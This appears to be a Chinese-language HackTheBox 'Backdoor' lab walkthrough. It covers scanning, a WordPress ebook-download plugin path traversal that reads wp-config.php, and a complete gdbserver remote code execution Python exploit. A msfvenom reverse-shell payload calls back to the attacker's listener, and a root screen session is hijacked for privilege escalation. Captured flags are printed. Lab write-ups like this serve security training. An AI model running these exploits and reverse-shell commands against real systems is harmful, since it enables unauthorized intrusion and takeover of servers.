Hackthebox - Backdoor
靶场信息
靶场类型
信息搜集
首先使用nmap进行端口扫描
┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.125
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-21 20:41 EST
Nmap scan report for 10.10.11.125
Host is up (0.39s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
1337/tcp open waste?
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/21%OT=22%CT=1%CU=33566%PV=Y%DS=2%DC=T%G=Y%TM=619AF5
OS:A4%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=100%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=FB%GCD=1%ISR=101%TI=Z%CI=Z%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3
OS:=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=FE88%W2=F
OS:E88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 492.34 ms loaclhost (10.10.14.1)
2 492.34 ms 10.10.11.125
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.37 seconds
从上可以看到该台靶机使用了WordPress 5.8.1 CMS作为服务搭建,咱们去wpscan一下,顺便搜索看看是否有漏洞
┌──(root💀kali)-[~/Desktop]
└─# wpscan --url 10.10.11.125 --enumerate vp,u,vt,tt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.17
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.11.125/ [10.10.11.125]
[+] Started: Sun Nov 21 20:55:16 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.11.125/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.11.125/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.11.125/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.11.125/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.11.125/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
| - http://10.10.11.125/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://10.10.11.125/wp-content/themes/twentyseventeen/
| Latest Version: 2.8 (up to date)
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.11.125/wp-content/themes/twentyseventeen/readme.txt
| Style URL: http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.8 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:30 <====================================================================================================================================> (358 / 358) 100.00% Time: 00:00:30
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] No themes Found.
[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:04:14 <==================================================================================================================================> (2575 / 2575) 100.00% Time: 00:04:14
[i] No Timthumbs Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:03 <======================================================================================================================================> (10 / 10) 100.00% Time: 00:00:03
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.11.125/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Nov 21 21:00:23 2021
[+] Requests Done: 2976
[+] Cached Requests: 18
[+] Data Sent: 836.808 KB
[+] Data Received: 721.12 KB
[+] Memory used: 297.57 MB
[+] Elapsed time: 00:05:07
这边扫描后并没有什么太多有用的信息,插件和主题都没扫描出来,但知道了管理员用户为admin
┌──(root💀kali)-[~/Desktop]
└─# searchsploit WordPress 5.8.1
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities | php/webapps/39553.txt
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection | php/webapps/44943.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection | php/webapps/48918.sh
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
搜索后也发现确实存在三个漏洞,但都是插件漏洞,暂时无法确定是否存在这些插件,咱们先去
看看网站内容
点击Home以后跳转到http://backdoor.htb/然后提示咱们无法访问,把backdoor.htb加入hosts里再访问
加入后简单看了一下似乎没有什么东西,咱们扫描一下路径看看吧
┌──(root💀kali)-[~/Desktop]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e -t 50 -u http://backdoor.htb/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://backdoor.htb/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/11/21 21:15:59 Starting gobuster in directory enumeration mode
===============================================================
http://backdoor.htb/wp-content (Status: 301) [Size: 317] [--> http://backdoor.htb/wp-content/]
http://backdoor.htb/wp-includes (Status: 301) [Size: 318] [--> http://backdoor.htb/wp-includes/]
http://backdoor.htb/wp-admin (Status: 301) [Size: 315] [--> http://backdoor.htb/wp-admin/]
http://backdoor.htb/server-status (Status: 403) [Size: 277]
===============================================================
2021/11/21 21:47:17 Finished
===============================================================
漏洞利用
还是没什么东西,有点难搞啊,只能手动去访问了,首先先去content看看吧
访问content后是空白页面,然后接着根据经验进行手动访问(由于我使用的是流量在进行渗透,继续爆破工作量比较大,只能根据经验进行判断了)
http://backdoor.htb/wp-content/plugins/在该路径下有内容了,并且是一个目录遍历漏洞
ebook-download应当是一个wordpress的插件,进去看一下
有内容的只有readme.txt 进去看一下
确认是一个插件,咱们去exploit-db搜索一下是否有漏洞
还真让我们找到一个漏洞
http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
这是一个任意文件下载的漏洞,下载一个配置文件看一下
确认漏洞存在且可被利用,拿着对数据库密码去尝试一下是否可以登录admin用户
好吧看来是我年轻了,是无法直接利用的,咱们还得想办法进入数据库
突然来了灵感,或许突破口在无法读取到任何信息的1337端口上呢?但是我们无法读取1337端口,怎么知道它是什么服务呢?
有办法
使用Wordpress插件的LFI(本地文件包含)来进行端口读取,咱说干就干
像这样读取/proc/pid/cmdline文件就可以了,其中pid是可变数字,根据测试数字范围应该在900-1000之间
所以我们像这样设置好就可以开始爆破了
有了,可以看到这里有一个gdbserver的服务,经过测试该服务是架设在1337端口上的,可以进行利用
同时还发现一个有趣的东西
瞧瞧,这还没getshell呢,已经把root的东西都搞到了,也是没谁了
这里找到了一篇gdbserver rce的exploit,开干
首先将exploit保存到本地
Step 1
# Exploit Title: GNU gdbserver 9.2 - Remote Command Execution (RCE)
# Date: 2021-11-21
# Exploit Author: Roberto Gesteira Miñarro (7Rocky)
# Vendor Homepage: https://www.gnu.org/software/gdb/
# Software Link: https://www.gnu.org/software/gdb/download/
# Version: GNU gdbserver (Ubuntu 9.2-0ubuntu1~20.04) 9.2
# Tested on: Ubuntu Linux (gdbserver debugging x64 and x86 binaries)
#!/usr/bin/env python3
import binascii
import socket
import struct
import sys
help = f'''
Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode>
Example:
- Victim's gdbserver -> 10.10.10.200:1337
- Attacker's listener -> 10.10.10.100:4444
1. Generate shellcode with msfvenom:
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin
2. Listen with Netcat:
$ nc -nlvp 4444
3. Run the exploit:
$ python3 {sys.argv[0]} 10.10.10.200:1337 rev.bin
'''
def checksum(s: str) -> str:
res = sum(map(ord, s)) % 256
return f'{res:2x}'
def ack(sock):
sock.send(b'+')
def send(sock, s: str) -> str:
sock.send(f'${s}#{checksum(s)}'.encode())
res = sock.recv(1024)
ack(sock)
return res.decode()
def exploit(sock, payload: str):
send(sock, 'qSupported:multiprocess+;qRelocInsn+;qvCont+;')
send(sock, '!')
try:
res = send(sock, 'vCont;s')
data = res.split(';')[2]
arch, pc = data.split(':')
except Exception:
print('[!] ERROR: Unexpected response. Try again later')
exit(1)
if arch == '10':
print('[+] Found x64 arch')
pc = binascii.unhexlify(pc[:pc.index('0*')])
pc += b'\0' * (8 - len(pc))
addr = hex(struct.unpack('<Q', pc)[0])[2:]
addr = '0' * (16 - len(addr)) + addr
elif arch == '08':
print('[+] Found x86 arch')
pc = binascii.unhexlify(pc)
pc += b'\0' * (4 - len(pc))
addr = hex(struct.unpack('<I', pc)[0])[2:]
addr = '0' * (8 - len(addr)) + addr
hex_length = hex(len(payload))[2:]
print('[+] Sending payload')
send(sock, f'M{addr},{hex_length}:{payload}')
send(sock, 'vCont;c')
def main():
if len(sys.argv) < 3:
print(help)
exit(1)
ip, port = sys.argv[1].split(':')
file = sys.argv[2]
try:
with open(file, 'rb') as f:
payload = f.read().hex()
except FileNotFoundError:
print(f'[!] ERROR: File {file} not found')
exit(1)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((ip, int(port)))
print('[+] Connected to target. Preparing exploit')
exploit(sock, payload)
print('[*] Pwned!! Check your listener')
if __name__ == '__main__':
main()
Step 2
然后使用msfvenom生成一个木马
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.23 LPORT=4444 PrependFork=true -o rev.bin
Step 3
使用nc监听一个本地端口
nc -nvlp 4444
Step 4
执行Exploit
┌──(root💀kali)-[~/Desktop]
└─# python3 exploit.py 10.10.11.125:1337 rev.bin 1 ⨯
[+] Connected to target. Preparing exploit
[+] Found x64 arch
[+] Sending payload
[*] Pwned!! Check your listener
然后成功弹回一个shell
┌──(root💀kali)-[~/Desktop]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.11.125] 50626
whoami&&id
user
uid=1000(user) gid=1000(user) groups=1000(user)
使用python3获取一个交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
user@Backdoor:/home/user$
user@Backdoor:/home/user$ ls
ls
user.txt
user@Backdoor:/home/user$ cat user.txt
cat user.txt
10ba3c92228d369cea03eec58f58420c
成功拿到user权限的flag
权限提升
还记得我们之前看到的screen吗?这就是提权的关键,提权只需要两句
export TERM=xterm
screen -x root/root
然后即可进入root权限
root@Backdoor:~# whoami&&id
whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)
成功提权到root权限
root@Backdoor:~# ls
ls
root.txt
root@Backdoor:~# cat root.txt
cat root.txt
692be0661cb8d3c7cdf05379c93b9e8c
成功拿到root用户的flag权限
